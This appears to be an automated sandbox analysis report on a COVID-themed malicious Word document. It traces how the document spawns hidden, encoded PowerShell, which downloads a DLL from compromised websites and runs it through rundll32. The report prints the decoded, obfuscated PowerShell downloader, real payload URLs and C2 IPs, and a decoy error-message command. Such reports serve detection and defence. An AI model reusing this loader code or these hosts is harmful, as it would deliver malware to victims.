Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: powershell.exe, 00000005.00000002.2086528973.0000000000404000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10003D55 mov eax, dword ptr fs:[00000030h]7_2_10003D55
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory protected: page execute read | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 69.49.88.46 80
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 71.72.196.159 80
Encrypted powershell cmdline option found
Source: unknown | Process created: Base64 decoded $8ZG = [tYpe]("{2}{5}{0}{1}{3}{4}"-f 'TE','m.','Sy','io','.DIrECtORY','S'); $D0Cq = [TYpe]("{2}{1}{0}{3}{4}" -f'sErvICEPo','Tem.nEt.','SYs','iNtma','nAGER') ; $Jbz3yaa=$D53E + [char](64) + $R76P;$G73O=('F'+('0'+'4V')); ( Get-VarIABle ("8Z"+"g") -vAlUeON )::"crE`A`TeDiR`eCt`oRy"($HOME + (('tK'+('L'+'K'+'jl48kr')+'t'+('KLNq'+'m9')+('t'+'y9')+'t'+'KL')-replAce ('tK'+'L'),[CHAr]92));$P43W=(('U_'+'2')+'P'); ( chILdiTeM VarIABlE:d0cq ).vaLue::"s`ecURIt`YpROt`OCoL" = (('Tl'+'s1')+'2');$S82G=(('G9'+'0')+'M');$D6trw02 = (('S9'+'3')+'E');$X6_M=('D3'+'0P');$G6ajv8d=$HOME+(('{0'+'}Kjl48kr'+'{0}Nq'+('m9ty'+'9')+'{0}')-f [CHar]92)+$D6trw02+(('.d'+'l')+'l');$V35U=(('S5'+'_')+'U');$Jitoa2e=(('w]xm[vs'+'://remed'+'ii'+'s.'+'c'+'o'+'m/t/gm2X/@'+'w')+(']x'+'m[v:'+'//ava')+('dn'+'an')+('sa'+'h')+'in'+('.c'+'om')+('/'+'wp'+'-inc')+'lu'+('de'+'s/w/@')+'w'+']'+('x'+'m[')+('v://'+'sol'+'ico')+'n'+('.us'+'/alla'+'m'+'-cy')+('cle'+'-1c4')+('gn'+'/f5')+'z/'+('@'+'w]')+('x'+'m['+'v:/'+'/www.riparazi'+'on'+'i'+'-')+('radi'+'o')+'tv'+'.c'+('om'+'/so')+'ft'+('ac'+'u')+('l'+'ous/'+'DZz/')+'@'+('w'+']xm[')+('v:/'+'/')+('ww'+'w')+('.agr'+'i'+'camp'+'eg')+('gi'+'o'+'cor')+('te'+'como')+'tt'+'o.'+('it'+'/')+('wp'+'-')+('a'+'dm')+('i'+'n'+'/s7'+'p1/@w]'+'xm[')+'v'+'s:'+'//'+'ww'+'w'+('.starl'+'i'+'n')+('gtechs.com'+'/'+'GNM'+'/@w'+']xm[v')+(':'+'/'+'/hellas')+('-d'+'arms'+'tad'+'t.d'+'e')+'/c'+('gi-bin'+'/Z')+'S'+('o'+'o/'))."rEplA`ce"((('w]xm'+'[')+'v'),([array](('ds'+('e'+'wf')),('we'+('vw'
Source: C:\Windows\System32\cmd.exe | Process created: Base64 decoded $8ZG = [tYpe]("{2}{5}{0}{1}{3}{4}"-f 'TE','m.','Sy','io','.DIrECtORY','S'); $D0Cq = [TYpe]("{2}{1}{0}{3}{4}" -f'sErvICEPo','Tem.nEt.','SYs','iNtma','nAGER') ; $Jbz3yaa=$D53E + [char](64) + $R76P;$G73O=('F'+('0'+'4V')); ( Get-VarIABle ("8Z"+"g") -vAlUeON )::"crE`A`TeDiR`eCt`oRy"($HOME + (('tK'+('L'+'K'+'jl48kr')+'t'+('KLNq'+'m9')+('t'+'y9')+'t'+'KL')-replAce ('tK'+'L'),[CHAr]92));$P43W=(('U_'+'2')+'P'); ( chILdiTeM VarIABlE:d0cq ).vaLue::"s`ecURIt`YpROt`OCoL" = (('Tl'+'s1')+'2');$S82G=(('G9'+'0')+'M');$D6trw02 = (('S9'+'3')+'E');$X6_M=('D3'+'0P');$G6ajv8d=$HOME+(('{0'+'}Kjl48kr'+'{0}Nq'+('m9ty'+'9')+'{0}')-f [CHar]92)+$D6trw02+(('.d'+'l')+'l');$V35U=(('S5'+'_')+'U');$Jitoa2e=(('w]xm[vs'+'://remed'+'ii'+'s.'+'c'+'o'+'m/t/gm2X/@'+'w')+(']x'+'m[v:'+'//ava')+('dn'+'an')+('sa'+'h')+'in'+('.c'+'om')+('/'+'wp'+'-inc')+'lu'+('de'+'s/w/@')+'w'+']'+('x'+'m[')+('v://'+'sol'+'ico')+'n'+('.us'+'/alla'+'m'+'-cy')+('cle'+'-1c4')+('gn'+'/f5')+'z/'+('@'+'w]')+('x'+'m['+'v:/'+'/www.riparazi'+'on'+'i'+'-')+('radi'+'o')+'tv'+'.c'+('om'+'/so')+'ft'+('ac'+'u')+('l'+'ous/'+'DZz/')+'@'+('w'+']xm[')+('v:/'+'/')+('ww'+'w')+('.agr'+'i'+'camp'+'eg')+('gi'+'o'+'cor')+('te'+'como')+'tt'+'o.'+('it'+'/')+('wp'+'-')+('a'+'dm')+('i'+'n'+'/s7'+'p1/@w]'+'xm[')+'v'+'s:'+'//'+'ww'+'w'+('.starl'+'i'+'n')+('gtechs.com'+'/'+'GNM'+'/@w'+']xm[v')+(':'+'/'+'/hellas')+('-d'+'arms'+'tad'+'t.d'+'e')+'/c'+('gi-bin'+'/Z')+'S'+('o'+'o/'))."rEplA`ce"((('w]xm'+'[')+'v'),([array](('ds'+('e'+'wf')),('we'+('vw'
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Giyrh\pugu.vsm',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivtnyogqxjx\ctmhexvkrv.xdn',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pvbzatsazzovzkv\hcdstjffkhswof.tvm',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ipdtn\rmgx.ktd',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wxiibgduobebnp\hfpumnmgeezpt.jsh',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ndsevdxfleyh\dktakeexwon.agz',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmtjatw\czosow.gcn',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp',ShowDialogA
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (5 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

The matrix is listed per tactic column. A number after a technique name is the report's signature-count badge for that technique, kept as extracted; techniques without a number were not matched.

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise

Execution: Windows Management Instrumentation 11, Command and Scripting Interpreter 211, Scripting 22, Exploitation for Client Execution 3, PowerShell 3, Launchd, Scheduled Task, Command and Scripting Interpreter, PowerShell, AppleScript

Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows)

Privilege Escalation: Process Injection 111, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job, At (Linux), At (Windows)

Defense Evasion: Masquerading 21, Virtualization/Sandbox Evasion 2, Disable or Modify Tools 11, Process Injection 111, Deobfuscate/Decode Files or Information 3, Scripting 22, Hidden Files and Directories 1, Obfuscated Files or Information 1, Rundll32 1, File Deletion 1

Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing

Discovery: Security Software Discovery 1, Virtualization/Sandbox Evasion 2, Process Discovery 1, Remote System Discovery 1, File and Directory Discovery 2, System Information Discovery 15, Network Sniffing, Network Service Scanning, System Network Connections Discovery, Process Discovery

Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot, Software Deployment Tools, Taint Shared Content

Collection: Archive Collected Data 1, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging

Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol, Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol

Command and Control: Encrypted Channel 12, Ingress Tool Transfer 2, Non-Application Layer Protocol 3, Application Layer Protocol 14, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols

Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols, Rogue Cellular Base Station

Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups

Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue, Data Destruction, Data Encrypted for Impact

Behavior Graph

Behavior Graph ID: 338773
Sample: XP-9743 Medical report COVI...
Startdate: 12/01/2021
Architecture: WINDOWS
Score: 100

Process tree as drawn in the graph (node numbers in parentheses; the file and registry count badges after a process name are kept as shown; signatures attached to a node follow the colon):

Start (2): Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; 12 other signatures
  • WINWORD.EXE (17) 293 23
  • cmd.exe (14): Suspicious powershell command line found; Very long command line found; Encrypted powershell cmdline option found
    • msg.exe (24)
    • powershell.exe (19) 12 9: Powershell drops PE file
      • DNS/IP: remediis.com 5.2.81.171, 443, 49165, 49166 ALASTYRTR Turkey
      • DNS/IP: avadnansahin.com 109.232.216.177, 49167, 80 AEROTEK-ASTR Turkey
      • Dropped file (49): C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll, PE32
      • rundll32.exe (26)
        • rundll32.exe (28) 2: Hides that the sample has been downloaded from the Internet (zone.identifier)
          • rundll32.exe (31) 1: Hides that the sample has been downloaded from the Internet (zone.identifier)
            • rundll32.exe (34) 1: Hides that the sample has been downloaded from the Internet (zone.identifier)
              • rundll32.exe (37) 1: Hides that the sample has been downloaded from the Internet (zone.identifier)
                • rundll32.exe (40) 1: Hides that the sample has been downloaded from the Internet (zone.identifier)
                  • rundll32.exe (43) 1: Hides that the sample has been downloaded from the Internet (zone.identifier)
                    • rundll32.exe (46) 1: Hides that the sample has been downloaded from the Internet (zone.identifier)


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

XP-9743 Medical report COVID-19.doc
  • Virustotal: 19%
  • ReversingLabs: 14%, Script-Macro.Trojan.Heuristic

Dropped Files

C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll
  • Joe Sandbox ML: 100%

Unpacked PE Files

Each of the following unpacked PE files is detected by Avira at 100% as HEUR/AGEN.1110387:
  • 11.2.rundll32.exe.1c0000.0.unpack
  • 12.2.rundll32.exe.280000.1.unpack
  • 7.2.rundll32.exe.220000.1.unpack
  • 14.2.rundll32.exe.270000.1.unpack
  • 9.2.rundll32.exe.220000.1.unpack
  • 15.2.rundll32.exe.1a0000.0.unpack
  • 10.2.rundll32.exe.1b0000.0.unpack
  • 14.2.rundll32.exe.250000.0.unpack
  • 10.2.rundll32.exe.1d0000.1.unpack
  • 15.2.rundll32.exe.1c0000.1.unpack
  • 11.2.rundll32.exe.1e0000.1.unpack
  • 8.2.rundll32.exe.1c0000.1.unpack
  • 13.2.rundll32.exe.1f0000.0.unpack
  • 9.2.rundll32.exe.200000.0.unpack
  • 8.2.rundll32.exe.1a0000.0.unpack
  • 13.2.rundll32.exe.210000.1.unpack

Domains

remediis.com
  • Virustotal: 2%
avadnansahin.com
  • Virustotal: 2%

URLs

http://avadnansahin.com
  • Virustotal: 2%
  • Avira URL Cloud: safe
http://hellas-darmstadt.de/cgi-bin/ZSoo/
  • Virustotal: 6%
  • Avira URL Cloud: malware
http://ocsp.sectigo.com0
  • URL Reputation: safe (4 entries)
https://remediis.comp
  • Avira URL Cloud: safe
http://solicon.us/allam-cycle-1c4gn/f5z/
  • Virustotal: 6%
  • Avira URL Cloud: malware
http://windowsmedia.com/redir/services.asp?WMPFriendly=true
  • URL Reputation: safe (4 entries)
http://avadnansahin.com/wp-includes/w/
  • Avira URL Cloud: safe
http://www.agricampeggiocortecomotto.it/wp-admin/s7p1/
  • Avira URL Cloud: safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
  • URL Reputation: safe (3 entries)
http://www.icra.org/vocabulary/.
  • URL Reputation: safe (3 entries)
https://remediis.com
  • Avira URL Cloud: safe
http://www.riparazioni-radiotv.com/softaculous/DZz/
  • Avira URL Cloud: safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
  • URL Reputation: safe (3 entries)
https://www.starlingtechs.com/GNM/
  • Avira URL Cloud: safe
https://sectigo.com/CPS0D
  • URL Reputation: safe (3 entries)
http://69.49.88.46/fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/
  • Avira URL Cloud: safe
http://www.%s.comPA
  • URL Reputation: safe (3 entries)
https://remediis.com/t/gm2X/
  • Avira URL Cloud: safe

Domains and IPs

Contacted Domains

remediis.com
  • IP: 5.2.81.171
  • Active: true
  • Malicious: true
  • Reputation: unknown
avadnansahin.com
  • IP: 109.232.216.177
  • Active: true
  • Malicious: true
  • Reputation: unknown

Contacted URLs

http://avadnansahin.com/wp-includes/w/
  • Malicious: true
  • Avira URL Cloud: safe
  • Reputation: unknown
http://69.49.88.46/fumwyj93myhz6vi/3lptbz7/e6hqkyw77ui/dujy6/2toe6aqef56s/cxrwnsqx/
  • Malicious: true
  • Avira URL Cloud: safe
  • Reputation: unknown

URLs from Memory and Binaries

http://www.windows.com/pctv.
  • Source: rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmp
  • Malicious: false
  • Reputation: high
http://investor.msn.com
  • Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmp
  • Malicious: false
  • Reputation: high
http://www.msnbc.com/news/ticker.txt
  • Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmp
  • Malicious: false
  • Reputation: high
http://avadnansahin.com
  • Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmp
  • Malicious: true
  • Virustotal: 2%
  • Avira URL Cloud: safe
  • Reputation: unknown
http://hellas-darmstadt.de/cgi-bin/ZSoo/
  • Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp
  • Malicious: true
  • Virustotal: 6%
  • Avira URL Cloud: malware
  • Reputation: unknown
http://ocsp.sectigo.com0
  • Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmp
  • Malicious: false
  • URL Reputation: safe (4 entries)
  • Reputation: unknown
https://remediis.comp
  • Source: powershell.exe, 00000005.00000002.2093497581.0000000003C5C000.00000004.00000001.sdmp
  • Malicious: false
  • Avira URL Cloud: safe
  • Reputation: unknown
http://solicon.us/allam-cycle-1c4gn/f5z/
  • Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp
  • Malicious: true
  • Virustotal: 6%
  • Avira URL Cloud: malware
  • Reputation: unknown
http://www.litespeedtech.com
  • Source: powershell.exe, 00000005.00000002.2093517208.0000000003C6E000.00000004.00000001.sdmp
  • Malicious: false
  • Reputation: high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true
  • Source: rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmp
  • Malicious: false
  • URL Reputation: safe (4 entries)
  • Reputation: unknown
http://www.hotmail.com/oe
  • Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmp
  • Malicious: false
  • Reputation: high
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
  • Source: rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmp
  • Malicious: false
  • Reputation: high
http://www.agricampeggiocortecomotto.it/wp-admin/s7p1/
  • Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp
  • Malicious: true
  • Avira URL Cloud: safe
  • Reputation: unknown
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
  • Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmp
  • Malicious: false
  • URL Reputation: safe (3 entries)
  • Reputation: unknown
http://www.icra.org/vocabulary/.
  • Source: rundll32.exe, 00000006.00000002.2092843874.0000000001DD7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089320581.00000000021B7000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2100702841.0000000001E87000.00000002.00000001.sdmp
  • Malicious: false
  • URL Reputation: safe (3 entries)
  • Reputation: unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
  • Source: powershell.exe, 00000005.00000002.2088032725.0000000002380000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2091689144.0000000002880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2092831737.00000000027A0000.00000002.00000001.sdmp
  • Malicious: false
  • Reputation: high
https://remediis.com
  • Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp
  • Malicious: true
  • Avira URL Cloud: safe
  • Reputation: unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
  • Source: powershell.exe, 00000005.00000002.2086528973.0000000000404000.00000004.00000020.sdmp
  • Malicious: false
  • Reputation: high
http://www.riparazioni-radiotv.com/softaculous/DZz/
  • Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp
  • Malicious: true
  • Avira URL Cloud: safe
  • Reputation: unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
  • Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmp
  • Malicious: false
  • URL Reputation: safe (3 entries)
  • Reputation: unknown
https://www.starlingtechs.com/GNM/
  • Source: powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp
  • Malicious: true
  • Avira URL Cloud: safe
  • Reputation: unknown
http://investor.msn.com/
  • Source: rundll32.exe, 00000006.00000002.2092559720.0000000001BF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2089009552.0000000001FD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091693708.0000000001D60000.00000002.00000001.sdmp
  • Malicious: false
  • Reputation: high
https://sectigo.com/CPS0D
  • Source: powershell.exe, 00000005.00000002.2093523040.0000000003C70000.00000004.00000001.sdmp
  • Malicious: false
  • URL Reputation: safe (3 entries)
  • Reputation: unknown
http://www.piriform.com/ccleaner
  • Source: powershell.exe, 00000005.00000002.2086528973.0000000000404000.00000004.00000020.sdmp
  • Malicious: false
  • Reputation: high
http://www.%s.comPA
  • Source: powershell.exe, 00000005.00000002.2088032725.0000000002380000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2091689144.0000000002880000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2092831737.00000000027A0000.00000002.00000001.sdmp
  • Malicious: false
  • URL Reputation: safe (3 entries)
  • Reputation: low
https://remediis.com/t/gm2X/
  • Source: powershell.exe, 00000005.00000002.2096044095.000000001B606000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2093046326.0000000003B41000.00000004.00000001.sdmp
  • Malicious: true
  • Avira URL Cloud: safe
  • Reputation: unknown

Contacted IPs

Public

69.49.88.46
  • Domain: unknown
  • Country: United States
  • ASN: 33734 MPW-MACHLINK-NETUS
  • Malicious: true
109.232.216.177
  • Domain: unknown
  • Country: Turkey
  • ASN: 42807 AEROTEK-ASTR
  • Malicious: true
71.72.196.159
  • Domain: unknown
  • Country: United States
  • ASN: 10796 TWC-10796-MIDWESTUS
  • Malicious: true
5.2.81.171
  • Domain: unknown
  • Country: Turkey
  • ASN: 3188 ALASTYRTR
  • Malicious: true

                      General Information

                      Joe Sandbox Version:31.0.0 Red Diamond
                      Analysis ID:338773
                      Start date:12.01.2021
                      Start time:20:30:12
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 7m 39s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:XP-9743 Medical report COVID-19.doc
                      Cookbook file name:defaultwindowsofficecookbook.jbs
                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                      Number of new started processes analysed:17
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • GSI enabled (VBA)
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.troj.evad.winDOC@26/7@2/4
                      EGA Information:Failed
                      HDC Information:
                      • Successful, ratio: 33.2% (good quality ratio 31.6%)
                      • Quality average: 71.6%
                      • Quality standard deviation: 24.9%
                      HCA Information:
                      • Successful, ratio: 72%
                      • Number of executed functions: 35
                      • Number of non-executed functions: 1
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Found application associated with file extension: .doc
                      • Found Word or Excel or PowerPoint or XPS Viewer
                      • Found warning dialog
                      • Click Ok
                      • Attach to Office via COM
                      • Scroll down
                      • Close Viewer
                      Warnings:
                      • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      Time | Type | Description
                      20:30:36 | API Interceptor | 1x Sleep call for process: msg.exe modified
                      20:30:37 | API Interceptor | 32x Sleep call for process: powershell.exe modified
                      20:30:41 | API Interceptor | 867x Sleep call for process: rundll32.exe modified

                      Joe Sandbox View / Context

                      IPs

                      Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                      Domains

                      No context

                      ASN

                      Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4AB68257-B28F-4AE5-86AD-026C320EA73C}.tmp
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):1024
                      Entropy (8bit):0.05390218305374581
                      Encrypted:false
                      SSDEEP:3:ol3lYdn:4Wn
                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\XP-9743 Medical report COVID-19.LNK
                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Wed Aug 26 14:08:12 2020, atime=Wed Jan 13 03:30:33 2021, length=161792, window=hide
                      Category:dropped
                      Size (bytes):2238
                      Entropy (8bit):4.553735922091283
                      Encrypted:false
                      SSDEEP:48:8T/XT3In3e/7J0e/kfQh2T/XT3In3e/7J0e/kfQ/:8T/XLIn3eOe8fQh2T/XLIn3eOe8fQ/
                      MD5:A1640691CEEC8E432223B5D9BF210FA0
                      SHA1:9774A9DCEEEDA35DEE3885096DEB30165BFAE407
